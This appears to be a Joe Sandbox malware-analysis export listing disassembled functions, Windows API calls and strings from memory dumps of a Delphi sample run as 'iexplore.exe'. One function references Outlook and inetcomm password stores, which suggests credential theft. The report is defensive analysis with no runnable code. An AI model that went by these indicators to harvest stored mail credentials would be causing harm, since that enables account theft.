Source File: 0000000A.00000001.248046088.00400000.00000040.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_1_400000_FB_390E.jbxd

Function 0040980C, Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 106

APIs

GetThreadLocale.KERNEL32(00000000,0040991F,?,?,?,?,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00409828

Strings

<_@, xrefs: 004098B5
t_@, xrefs: 004098DA
|^@, xrefs: 00409846

Memory Dump Source

Source File: 0000000A.00000001.248046088.00400000.00000040.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_1_400000_FB_390E.jbxd

Function 0040A32E, Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 86

APIs

VirtualQuery.KERNEL32(?,?,0000001C,00000000,0040A4EB), ref: 0040A39B
GetModuleFileNameA.KERNEL32(?,?,00000105,?,?,0000001C,00000000,0040A4EB), ref: 0040A3BD

Part of subcall function 00405930: LoadStringA.USER32(00000000,0000FFF1,?,00001000), ref: 00405962

Strings

Xf@, xrefs: 0040A452
t^@, xrefs: 0040A440

Memory Dump Source

Source File: 0000000A.00000001.248046088.00400000.00000040.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_1_400000_FB_390E.jbxd

Function 0040E88C, Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 45

APIs

VariantClear.OLEAUT32(?,?,?,?,0040E91A,0040E867,?,?,?), ref: 0040E89B
VariantInit.OLEAUT32(?,?,?,?,?,0040E91A,0040E867,?,?,?), ref: 0040E8FE

Part of subcall function 0040E710: SafeArrayGetLBound.OLEAUT32(?,00000001,?), ref: 0040E7BF
Part of subcall function 0040E710: SafeArrayGetUBound.OLEAUT32(?,00000001,?,?,00000001,?), ref: 0040E7DB
Part of subcall function 0040E710: SafeArrayPtrOfIndex.OLEAUT32(?,?,?), ref: 0040E852
Part of subcall function 0040E710: VariantClear.OLEAUT32(?), ref: 0040E87B

Part of subcall function 004101B8: EnterCriticalSection.KERNEL32(0041899C,?,?,?,00000000,?,0040FDDC,00000000,0040FE82,?,?,?,?,?,0040E1EB,00000000), ref: 004101EE
Part of subcall function 004101B8: LeaveCriticalSection.KERNEL32(0041899C,00410267,?,0041899C,?,?,?,00000000,?,0040FDDC,00000000,0040FE82), ref: 0041025A

VariantClear.OLEAUT32(?,?,?,?,0040E91A,0040E867,?,?,?), ref: 0040E8F8

Strings

X@, xrefs: 0040E8C6

Memory Dump Source

Source File: 0000000A.00000002.256013044.00400000.00000040.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_400000_FB_390E.jbxd

Function 0040B25C, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 16

APIs

GetModuleHandleA.KERNEL32(kernel32.dll,?,0041110B,00000000,0041111E), ref: 0040B262
GetProcAddress.KERNEL32(00000000,GetDiskFreeSpaceExA,kernel32.dll,?,0041110B,00000000,0041111E), ref: 0040B273

Strings

GetDiskFreeSpaceExA, xrefs: 0040B26D
kernel32.dll, xrefs: 0040B25D

Memory Dump Source

Source File: 0000000A.00000001.248046088.00400000.00000040.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_1_400000_FB_390E.jbxd

Function 00408AB8, Relevance: 6.4, Strings: 5, Instructions: 127

Strings

AAA, xrefs: 00408BC8
AM/PM, xrefs: 00408AC2
AMPM, xrefs: 00408B3A
A/P, xrefs: 00408AFE
AAAA, xrefs: 00408B82

Memory Dump Source

Source File: 0000000A.00000001.248046088.00400000.00000040.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_1_400000_FB_390E.jbxd

Function 0040A5D4, Relevance: 6.3, Strings: 5, Instructions: 28

Strings

l]@, xrefs: 0040A5EB
\@, xrefs: 0040A5D4
@A, xrefs: 0040A640
De@, xrefs: 0040A5F3
(@A, xrefs: 0040A64D

Memory Dump Source

Source File: 0000000A.00000001.248046088.00400000.00000040.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_1_400000_FB_390E.jbxd

Function 0040E710, Relevance: 6.1, APIs: 4, Instructions: 115

APIs

SafeArrayGetLBound.OLEAUT32(?,00000001,?), ref: 0040E7BF
SafeArrayGetUBound.OLEAUT32(?,00000001,?,?,00000001,?), ref: 0040E7DB
SafeArrayPtrOfIndex.OLEAUT32(?,?,?), ref: 0040E852
VariantClear.OLEAUT32(?), ref: 0040E87B

Memory Dump Source

Source File: 0000000A.00000001.248046088.00400000.00000040.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_1_400000_FB_390E.jbxd

Function 00409CD0, Relevance: 6.1, APIs: 4, Instructions: 102

APIs

VirtualQuery.KERNEL32(?,?,0000001C), ref: 00409CED
GetModuleFileNameA.KERNEL32(?,?,00000105), ref: 00409D11
GetModuleFileNameA.KERNEL32(00400000,?,00000105), ref: 00409D2C
LoadStringA.USER32(00000000,0000FFE7,?,00000100), ref: 00409DC2

Memory Dump Source

Source File: 0000000A.00000001.248046088.00400000.00000040.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_1_400000_FB_390E.jbxd

Function 00409CCE, Relevance: 6.1, APIs: 4, Instructions: 101

APIs

VirtualQuery.KERNEL32(?,?,0000001C), ref: 00409CED
GetModuleFileNameA.KERNEL32(?,?,00000105), ref: 00409D11
GetModuleFileNameA.KERNEL32(00400000,?,00000105), ref: 00409D2C
LoadStringA.USER32(00000000,0000FFE7,?,00000100), ref: 00409DC2

Memory Dump Source

Source File: 0000000A.00000001.248046088.00400000.00000040.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_1_400000_FB_390E.jbxd

Function 004084B8, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 79

APIs

GetThreadLocale.KERNEL32(00000004,?,00000000,?,00000100,00000000,004085A6), ref: 0040853E
GetDateFormatA.KERNEL32(00000000,00000004,?,00000000,?,00000100), ref: 00408544

Strings

yyyy, xrefs: 00408519

Memory Dump Source

Source File: 0000000A.00000001.248046088.00400000.00000040.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_1_400000_FB_390E.jbxd

Function 0040EB84, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 63

APIs

VariantCopy.OLEAUT32(?,?,?,?,?,?,0040EC70,?,?,0040EEA5,00000000,0040EECE,?,?), ref: 0040EBA5
VariantCopy.OLEAUT32(?,?,?,?,?,?,0040EC70,?,?,0040EEA5,00000000,0040EECE,?,?), ref: 0040EC20

Part of subcall function 0040E9B0: SafeArrayGetLBound.OLEAUT32(?,00000001,?), ref: 0040EA49
Part of subcall function 0040E9B0: SafeArrayGetUBound.OLEAUT32(?,00000001,?,?,00000001,?), ref: 0040EA65
Part of subcall function 0040E9B0: SafeArrayCreate.OLEAUT32(0000000C,?,?), ref: 0040EA9E
Part of subcall function 0040E9B0: SafeArrayPtrOfIndex.OLEAUT32(?,?,?,0000000C,?,?), ref: 0040EB1B
Part of subcall function 0040E9B0: SafeArrayPtrOfIndex.OLEAUT32(00000000,?,?,?,?,?,0000000C,?,?), ref: 0040EB34
Part of subcall function 0040E9B0: VariantCopy.OLEAUT32(?), ref: 0040EB69

Part of subcall function 004101B8: EnterCriticalSection.KERNEL32(0041899C,?,?,?,00000000,?,0040FDDC,00000000,0040FE82,?,?,?,?,?,0040E1EB,00000000), ref: 004101EE
Part of subcall function 004101B8: LeaveCriticalSection.KERNEL32(0041899C,00410267,?,0041899C,?,?,?,00000000,?,0040FDDC,00000000,0040FE82), ref: 0041025A

Part of subcall function 0040E88C: VariantClear.OLEAUT32(?,?,?,?,0040E91A,0040E867,?,?,?), ref: 0040E89B
Part of subcall function 0040E88C: VariantClear.OLEAUT32(?,?,?,?,0040E91A,0040E867,?,?,?), ref: 0040E8F8
Part of subcall function 0040E88C: VariantInit.OLEAUT32(?,?,?,?,?,0040E91A,0040E867,?,?,?), ref: 0040E8FE

Strings

X@, xrefs: 0040EBE1

Memory Dump Source

Source File: 0000000A.00000002.256013044.00400000.00000040.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_400000_FB_390E.jbxd

Function 0040FD5C, Relevance: 5.1, Strings: 4, Instructions: 85

Strings

ByRef , xrefs: 0040FE5F
Any, xrefs: 0040FDC6
String, xrefs: 0040FDAE
Array , xrefs: 0040FE4C

Memory Dump Source

Source File: 0000000A.00000001.248046088.00400000.00000040.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_1_400000_FB_390E.jbxd

Function 00406D98, Relevance: 5.0, Strings: 4, Instructions: 27

Strings

Pi@, xrefs: 00406DB2
ti@, xrefs: 00406DE9
True, xrefs: 00406DC5
False, xrefs: 00406DFC

Memory Dump Source

Source File: 0000000A.00000001.248046088.00400000.00000040.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_1_400000_FB_390E.jbxd

Analysis Process: iexplore.exe PID: 3608 Parent PID: 3560

Execution Graph

Execution Coverage:	3.3%
Dynamic/Decrypted Code Coverage:	2%
Signature Coverage:	3.7%
Total number of Nodes:	1220
Total number of Limit Nodes:	56

Executed Functions

Function 004068F0, Relevance: 35.2, APIs: 17, Strings: 3, Instructions: 184

APIs

GetModuleFileNameA.KERNEL32(00000000,?,00000105), ref: 0040690C
RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105), ref: 0040692A
RegOpenKeyExA.ADVAPI32(80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105), ref: 00406948
RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000), ref: 00406966

Part of subcall function 0040672C: GetModuleHandleA.KERNEL32(kernel32.dll), ref: 00406749
Part of subcall function 0040672C: GetProcAddress.KERNEL32(00000000,GetLongPathNameA,kernel32.dll), ref: 00406760
Part of subcall function 0040672C: lstrcpyn.KERNEL32(?,?,?), ref: 00406790
Part of subcall function 0040672C: lstrcpyn.KERNEL32(?,?,?,kernel32.dll), ref: 004067F4
Part of subcall function 0040672C: lstrcpyn.KERNEL32(?,?,00000001,?,?,?,kernel32.dll), ref: 0040682A
Part of subcall function 0040672C: FindFirstFileA.KERNEL32(?,?,?,?,00000001,?,?,?,kernel32.dll), ref: 0040683D
Part of subcall function 0040672C: FindClose.KERNEL32(000000FF,?,?,?,?,00000001,?,?,?,kernel32.dll), ref: 0040684F
Part of subcall function 0040672C: lstrlen.KERNEL32(?,000000FF,?,?,?,?,00000001,?,?,?,kernel32.dll), ref: 0040685B
Part of subcall function 0040672C: lstrcpyn.KERNEL32(0000005D,?,00000104), ref: 0040688F
Part of subcall function 0040672C: lstrlen.KERNEL32(?,0000005D,?,00000104), ref: 0040689B
Part of subcall function 0040672C: lstrcpyn.KERNEL32(?,0000005C,?,?,0000005D,?,00000104), ref: 004068BD

RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,00000000,00000005,00000000,004069F5,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?), ref: 004069AF
RegQueryValueExA.ADVAPI32(?,00406B5C,00000000,00000000,00000000,00000005,?,?,00000000,00000000,00000000,00000005,00000000,004069F5,?,80000001), ref: 004069CD
RegCloseKey.ADVAPI32(?,004069FC,00000000,00000000,00000005,00000000,004069F5,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105), ref: 004069EF
lstrcpyn.KERNEL32(?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000), ref: 00406A0C
GetThreadLocale.KERNEL32(00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?), ref: 00406A19
GetLocaleInfoA.KERNEL32(00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019), ref: 00406A1F
lstrlen.KERNEL32(00000000), ref: 00406A4A
lstrcpyn.KERNEL32(00000000,00000000,00000105,00000000), ref: 00406A91
LoadLibraryExA.KERNEL32(00000000,00000000,00000002,00000000,00000000,00000105,00000000), ref: 00406AA1
lstrcpyn.KERNEL32(00000000,00000000,00000105,00000000), ref: 00406AC9
LoadLibraryExA.KERNEL32(00000000,00000000,00000002,00000000,00000000,00000105,00000000), ref: 00406AD9
lstrcpyn.KERNEL32(00000000,00000000,00000105,00000000,00000000,00000002,00000000,00000000,00000105,00000000), ref: 00406AFF
LoadLibraryExA.KERNEL32(00000000,00000000,00000002,00000000,00000000,00000105,00000000,00000000,00000002,00000000,00000000,00000105,00000000), ref: 00406B0F

Strings

Software\Borland\Delphi\Locales, xrefs: 0040695C
., xrefs: 00406A5C
Software\Borland\Locales, xrefs: 00406920, 0040693E

Memory Dump Source

Source File: 0000000B.00000002.292276789.00400000.00000040.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_iexplore.jbxd

Function 00409D7C, Relevance: 3.0, APIs: 2, Instructions: 33

APIs

FindFirstFileA.KERNEL32(00000000,?,?,?,?,004737CC,00000000,00473862,?,?,?,004738D7,?,00000000,004738EE), ref: 00409D97
GetLastError.KERNEL32(00000000,?,?,?,?,004737CC,00000000,00473862,?,?,?,004738D7,?,00000000,004738EE), ref: 00409DBC

Part of subcall function 00409CF8: FindNextFileA.KERNEL32(?,?), ref: 00409D09
Part of subcall function 00409CF8: GetLastError.KERNEL32(?,?), ref: 00409D12
Part of subcall function 00409CF8: FileTimeToLocalFileTime.KERNEL32(?), ref: 00409D28
Part of subcall function 00409CF8: FileTimeToDosDateTime.KERNEL32(?,?,?), ref: 00409D37

Part of subcall function 00409DF0: FindClose.KERNEL32(?,?,00409DBA,00000000,?,?,?,?,004737CC,00000000,00473862,?,?,?,004738D7), ref: 00409DFC

Memory Dump Source

Source File: 0000000B.00000002.292276789.00400000.00000040.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_iexplore.jbxd

Function 0043B9DC, Relevance: 19.9, APIs: 13, Instructions: 386

APIs

Part of subcall function 0043B86C: SetThreadLocale.KERNEL32(00000400,?,?,?,0043BA4F,00000000,0043C067), ref: 0043B88F

Part of subcall function 0043C0A0: SetActiveWindow.USER32(?), ref: 0043C0C5
Part of subcall function 0043C0A0: IsWindowEnabled.USER32(00000000), ref: 0043C0F1
Part of subcall function 0043C0A0: SetWindowPos.USER32(?,00000000,00000000,00000000,?,00000000,00000040), ref: 0043C13B
Part of subcall function 0043C0A0: DefWindowProcA.USER32(?,00000112,0000F020,00000000), ref: 0043C150

Part of subcall function 0043C180: SetActiveWindow.USER32(?), ref: 0043C19F
Part of subcall function 0043C180: ShowWindow.USER32(00000000,00000009), ref: 0043C1C4
Part of subcall function 0043C180: IsWindowEnabled.USER32(00000000), ref: 0043C1E3
Part of subcall function 0043C180: DefWindowProcA.USER32(?,00000112,0000F120,00000000), ref: 0043C1FC
Part of subcall function 0043C180: SetWindowPos.USER32(?,00000000,00000000,?,?,0043BBCE,00000000), ref: 0043C242
Part of subcall function 0043C180: SetFocus.USER32(00000000), ref: 0043C290

Part of subcall function 0043C084: LoadIconA.USER32(00000000,00007F00), ref: 0043C09A

PostMessageA.USER32(?,0000B001,00000000,00000000), ref: 0043BCDD

Part of subcall function 0043B57C: SetWindowPos.USER32(00000000,000000FF,00000000,00000000,00000000,00000000,00000213), ref: 0043B5CA

PostMessageA.USER32(?,0000B000,00000000,00000000), ref: 0043BCBB
SendMessageA.USER32(?,?,?,?), ref: 0043BD83

Part of subcall function 00404EA0: FreeLibrary.KERNEL32(MZP,?,?,?,00000002,00404F86,00403053,0040309A), ref: 00404F28
Part of subcall function 00404EA0: ExitProcess.KERNEL32(00000000,?,?,?,00000002,00404F86,00403053,0040309A), ref: 00404F60

Part of subcall function 0043C544: IsWindowEnabled.USER32(00000000), ref: 0043C580

IsWindowEnabled.USER32(00000000), ref: 0043BE28
IsWindowVisible.USER32(00000000), ref: 0043BE3D
GetFocus.USER32 ref: 0043BE51
SetFocus.USER32(00000000), ref: 0043BE60
SetFocus.USER32(00000000), ref: 0043BE7F
IsWindowEnabled.USER32(00000000), ref: 0043BEE0
SetFocus.USER32(00000000), ref: 0043BF02
GetLastActivePopup.USER32(?), ref: 0043BF1A

Part of subcall function 004316B4: IsIconic.USER32(0003017E), ref: 004316CB

GetFocus.USER32 ref: 0043BF5F

Part of subcall function 004319DC: GetCurrentThreadId.KERNEL32(Function_00031978,00000000,004388D4,00000000,00438957), ref: 004319F6
Part of subcall function 004319DC: EnumThreadWindows.USER32(00000000,Function_00031978,00000000), ref: 004319FC

SetFocus.USER32(00000000), ref: 0043BF80

Part of subcall function 0043CBB0: PostMessageA.USER32(0003017E,0000B01F,00000000,00000000), ref: 0043CCC9

Part of subcall function 0043C7E0: SendMessageA.USER32(?,0000B020,00000001,?), ref: 0043C804

Part of subcall function 0043C784: SendMessageA.USER32(?,0000B020,00000000,?), ref: 0043C7A6

Part of subcall function 0045793C: SystemParametersInfoA.USER32(00000068,00000000,016E3408,00000000), ref: 00457980
Part of subcall function 0045793C: SendMessageA.USER32(00000000,00000000,00000000,00000000), ref: 00457993

Part of subcall function 0043B954: DefWindowProcA.USER32(?,?,?,?), ref: 0043B97E

Memory Dump Source

Source File: 0000000B.00000002.292276789.00400000.00000040.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_iexplore.jbxd

Function 0043B1A0, Relevance: 19.4, APIs: 9, Strings: 2, Instructions: 131

APIs

Part of subcall function 00422AAC: VirtualAlloc.KERNEL32(00000000,00001000,00001000,00000040), ref: 00422ACA

GetClassInfoA.USER32(MZP,0043AE3C,?), ref: 0043B1FF
RegisterClassA.USER32(004E5430), ref: 0043B217

Part of subcall function 004071CC: LoadStringA.USER32(00000000,00010000,?,00001000), ref: 004071FE

Part of subcall function 00407FD4: CreateWindowExA.USER32(?,?,?,?,?,?,?,?,?,?,?,?), ref: 00408013

SetWindowLongA.USER32(?,000000FC,?), ref: 0043B2AB
DeleteMenu.USER32(00000000,0000F010,00000000), ref: 0043B31E

Part of subcall function 0043C084: LoadIconA.USER32(00000000,00007F00), ref: 0043C09A

SendMessageA.USER32(?,00000080,00000001,00000000), ref: 0043B2CD
SetClassLongA.USER32(?,000000F2,00000000), ref: 0043B2E0
GetSystemMenu.USER32(?,00000000), ref: 0043B2EB
DeleteMenu.USER32(00000000,0000F030,00000000), ref: 0043B2FA
DeleteMenu.USER32(00000000,0000F000,00000000), ref: 0043B307

Strings

MZP, xrefs: 0043B1FE, 0043B27A
\1B, xrefs: 0043B224

Memory Dump Source

Source File: 0000000B.00000002.292276789.00400000.00000040.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_iexplore.jbxd

Function 00457D98, Relevance: 19.4, APIs: 7, Strings: 4, Instructions: 103

APIs

GetCurrentProcessId.KERNEL32(?,00000000,00457F10), ref: 00457DB9
GlobalAddAtomA.KERNEL32(00000000), ref: 00457DEC
GetCurrentThreadId.KERNEL32(?,?,00000000,00457F10), ref: 00457E07
GlobalAddAtomA.KERNEL32(00000000), ref: 00457E3D
RegisterClipboardFormatA.USER32(00000000), ref: 00457E53

Part of subcall function 0041AB08: RtlInitializeCriticalSection.NTDLL(004180E0), ref: 0041AB27

Part of subcall function 004579A0: SetErrorMode.KERNEL32(00008000), ref: 004579B9
Part of subcall function 004579A0: GetModuleHandleA.KERNEL32(USER32,00000000,00457B06,?,00008000), ref: 004579DD
Part of subcall function 004579A0: GetProcAddress.KERNEL32(00000000,WINNLSEnableIME,USER32,00000000,00457B06,?,00008000), ref: 004579EA
Part of subcall function 004579A0: LoadLibraryA.KERNEL32(imm32.dll), ref: 00457A06
Part of subcall function 004579A0: GetProcAddress.KERNEL32(00000000,ImmGetContext,imm32.dll,00000000,00457B06,?,00008000), ref: 00457A28
Part of subcall function 004579A0: GetProcAddress.KERNEL32(00000000,ImmReleaseContext,00000000,ImmGetContext,imm32.dll,00000000,00457B06,?,00008000), ref: 00457A3D
Part of subcall function 004579A0: GetProcAddress.KERNEL32(00000000,ImmGetConversionStatus,00000000,ImmReleaseContext,00000000,ImmGetContext,imm32.dll,00000000,00457B06,?,00008000), ref: 00457A52
Part of subcall function 004579A0: GetProcAddress.KERNEL32(00000000,ImmSetConversionStatus,00000000,ImmGetConversionStatus,00000000,ImmReleaseContext,00000000,ImmGetContext,imm32.dll,00000000,00457B06,?,00008000), ref: 00457A67
Part of subcall function 004579A0: GetProcAddress.KERNEL32(00000000,ImmSetOpenStatus,00000000,ImmSetConversionStatus,00000000,ImmGetConversionStatus,00000000,ImmReleaseContext,00000000,ImmGetContext,imm32.dll,00000000,00457B06,?,00008000), ref: 00457A7C
Part of subcall function 004579A0: GetProcAddress.KERNEL32(00000000,ImmSetCompositionWindow,00000000,ImmSetOpenStatus,00000000,ImmSetConversionStatus,00000000,ImmGetConversionStatus,00000000,ImmReleaseContext,00000000,ImmGetContext,imm32.dll,00000000,00457B06), ref: 00457A91
Part of subcall function 004579A0: GetProcAddress.KERNEL32(00000000,ImmSetCompositionFontA,00000000,ImmSetCompositionWindow,00000000,ImmSetOpenStatus,00000000,ImmSetConversionStatus,00000000,ImmGetConversionStatus,00000000,ImmReleaseContext,00000000,ImmGetContext,imm32.dll,00000000), ref: 00457AA6
Part of subcall function 004579A0: GetProcAddress.KERNEL32(00000000,ImmGetCompositionStringA,00000000,ImmSetCompositionFontA,00000000,ImmSetCompositionWindow,00000000,ImmSetOpenStatus,00000000,ImmSetConversionStatus,00000000,ImmGetConversionStatus,00000000,ImmReleaseContext,00000000,ImmGetContext), ref: 00457ABB
Part of subcall function 004579A0: GetProcAddress.KERNEL32(00000000,ImmIsIME,00000000,ImmGetCompositionStringA,00000000,ImmSetCompositionFontA,00000000,ImmSetCompositionWindow,00000000,ImmSetOpenStatus,00000000,ImmSetConversionStatus,00000000,ImmGetConversionStatus,00000000,ImmReleaseContext), ref: 00457AD0
Part of subcall function 004579A0: GetProcAddress.KERNEL32(00000000,ImmNotifyIME,00000000,ImmIsIME,00000000,ImmGetCompositionStringA,00000000,ImmSetCompositionFontA,00000000,ImmSetCompositionWindow,00000000,ImmSetOpenStatus,00000000,ImmSetConversionStatus,00000000,ImmGetConversionStatus), ref: 00457AE5
Part of subcall function 004579A0: SetErrorMode.KERNEL32(?,00457B0D,00008000), ref: 00457B00

Part of subcall function 00439C44: GetKeyboardLayout.USER32(00000000), ref: 00439C89
Part of subcall function 00439C44: GetDC.USER32(00000000), ref: 00439CDE
Part of subcall function 00439C44: GetDeviceCaps.GDI32(00000000,0000005A), ref: 00439CE8
Part of subcall function 00439C44: ReleaseDC.USER32(00000000,00000000), ref: 00439CF3

Part of subcall function 0043AE4C: LoadIconA.USER32(MZP,MAINICON), ref: 0043AF43
Part of subcall function 0043AE4C: GetModuleFileNameA.KERNEL32(MZP,?,00000100,MZP,MAINICON), ref: 0043AF75
Part of subcall function 0043AE4C: OemToCharA.USER32(?,?), ref: 0043AF88
Part of subcall function 0043AE4C: CharNextA.USER32(?), ref: 0043AFC7
Part of subcall function 0043AE4C: CharLowerA.USER32(00000000), ref: 0043AFCD

GetModuleHandleA.KERNEL32(USER32,00000000,00000000,?,?,00000000,00457F10), ref: 00457ED7
GetProcAddress.KERNEL32(00000000,AnimateWindow,USER32,00000000,00000000,?,?,00000000,00457F10), ref: 00457EE8

Strings

Delphi%.8X, xrefs: 00457DCA
USER32, xrefs: 00457ED2
ControlOfs%.8X%.8X, xrefs: 00457E1B
AnimateWindow, xrefs: 00457EE2

Memory Dump Source

Source File: 0000000B.00000002.292276789.00400000.00000040.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_iexplore.jbxd

Function 004709A0, Relevance: 18.0, APIs: 5, Strings: 5, Instructions: 494

APIs

Part of subcall function 0046FA54: CoTaskMemFree.OLE32(00000000), ref: 0046FAA7

Part of subcall function 004095A4: CharLowerBuffA.USER32(00000000,?), ref: 004095D2

Part of subcall function 0046FAB4: CoTaskMemFree.OLE32(?), ref: 0046FB12

IsTextUnicode.ADVAPI32(00000000,?,00000000), ref: 00470BD9
CoTaskMemFree.OLE32(?), ref: 00470C4A
IsTextUnicode.ADVAPI32(00000000,?,00000000), ref: 00470DA8
CoTaskMemFree.OLE32(?), ref: 00470FCF

Part of subcall function 004706E0: IsTextUnicode.ADVAPI32(00000000,?,00000000), ref: 00470719

CoTaskMemFree.OLE32(?), ref: 00470E19

Part of subcall function 0046F92C: CoTaskMemFree.OLE32(00000000), ref: 0046FA09

Part of subcall function 00409264: StringFromCLSID.OLE32(?), ref: 0040926A
Part of subcall function 00409264: CoTaskMemFree.OLE32(00000000), ref: 00409297

Strings

identification, xrefs: 00470A29
inetcomm server passwords, xrefs: 00470ADF
outlook account manager passwords, xrefs: 00470CAE
identities, xrefs: 00470E7D
identitymgr, xrefs: 00470A5D

Memory Dump Source

Source File: 0000000B.00000002.292276789.00400000.00000040.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_iexplore.jbxd

Function 0043AE4C, Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 135

APIs

LoadIconA.USER32(MZP,MAINICON), ref: 0043AF43

Part of subcall function 0042AFA4: GetIconInfo.USER32(?,?), ref: 0042AFC5
Part of subcall function 0042AFA4: GetObjectA.GDI32(?,00000018,?), ref: 0042AFE6
Part of subcall function 0042AFA4: DeleteObject.GDI32(?), ref: 0042B012
Part of subcall function 0042AFA4: DeleteObject.GDI32(?), ref: 0042B01B

GetModuleFileNameA.KERNEL32(MZP,?,00000100,MZP,MAINICON), ref: 0043AF75
OemToCharA.USER32(?,?), ref: 0043AF88
CharNextA.USER32(?), ref: 0043AFC7
CharLowerA.USER32(00000000), ref: 0043AFCD

Part of subcall function 00422B68: GetClassInfoA.USER32(MZP,00422B58,?), ref: 00422B89
Part of subcall function 00422B68: UnregisterClassA.USER32(00422B58,MZP), ref: 00422BB2
Part of subcall function 00422B68: RegisterClassA.USER32(004E4B98), ref: 00422BBC
Part of subcall function 00422B68: SetWindowLongA.USER32(00000000,000000FC,00000000), ref: 00422C07

Part of subcall function 0043B1A0: GetClassInfoA.USER32(MZP,0043AE3C,?), ref: 0043B1FF
Part of subcall function 0043B1A0: RegisterClassA.USER32(004E5430), ref: 0043B217
Part of subcall function 0043B1A0: SetWindowLongA.USER32(?,000000FC,?), ref: 0043B2AB
Part of subcall function 0043B1A0: SendMessageA.USER32(?,00000080,00000001,00000000), ref: 0043B2CD
Part of subcall function 0043B1A0: SetClassLongA.USER32(?,000000F2,00000000), ref: 0043B2E0
Part of subcall function 0043B1A0: GetSystemMenu.USER32(?,00000000), ref: 0043B2EB
Part of subcall function 0043B1A0: DeleteMenu.USER32(00000000,0000F030,00000000), ref: 0043B2FA
Part of subcall function 0043B1A0: DeleteMenu.USER32(00000000,0000F000,00000000), ref: 0043B307
Part of subcall function 0043B1A0: DeleteMenu.USER32(00000000,0000F010,00000000), ref: 0043B31E

Strings

MZP, xrefs: 0043AF42, 0043AF74
MAINICON, xrefs: 0043AF36
tKN, xrefs: 0043AE8B, 0043AE97
lKN, xrefs: 0043AE71, 0043AE7D

Memory Dump Source

Source File: 0000000B.00000002.292276789.00400000.00000040.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_iexplore.jbxd

Function 0040E9C0, Relevance: 12.5, APIs: 1, Strings: 6, Instructions: 201

APIs

Part of subcall function 0040E8FC: GetThreadLocale.KERNEL32 ref: 0040E91E
Part of subcall function 0040E8FC: GetSystemMetrics.USER32(0000004A), ref: 0040E971
Part of subcall function 0040E8FC: GetSystemMetrics.USER32(0000002A), ref: 0040E980

Part of subcall function 0040D1E4: GetThreadLocale.KERNEL32(00000000,0040D2F7,?,?,?,?,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0040D200

GetThreadLocale.KERNEL32(00000000,0040EC8B,?,?,00000000,00000000), ref: 0040E9F6

Part of subcall function 0040D130: GetLocaleInfoA.KERNEL32(?,?,?,00000100), ref: 0040D14E

Part of subcall function 0040D17C: GetLocaleInfoA.KERNEL32(00000000,0000000F,?,00000002,0000002C,?,?,00000000,0040EA72,00000000,0040EC8B,?,?,00000000,00000000), ref: 0040D18F

Part of subcall function 0040D5B8: GetThreadLocale.KERNEL32(?,00000000,0040D788,?,?,?,?,00000000,00000000,00000000,00000000,00000000), ref: 0040D5E7

Part of subcall function 0040D508: GetThreadLocale.KERNEL32(?,00000000,0040D59F,?,?,00000000), ref: 0040D520
Part of subcall function 0040D508: GetThreadLocale.KERNEL32(00000000,00000004,00000000,0040D59F,?,?,00000000), ref: 0040D550
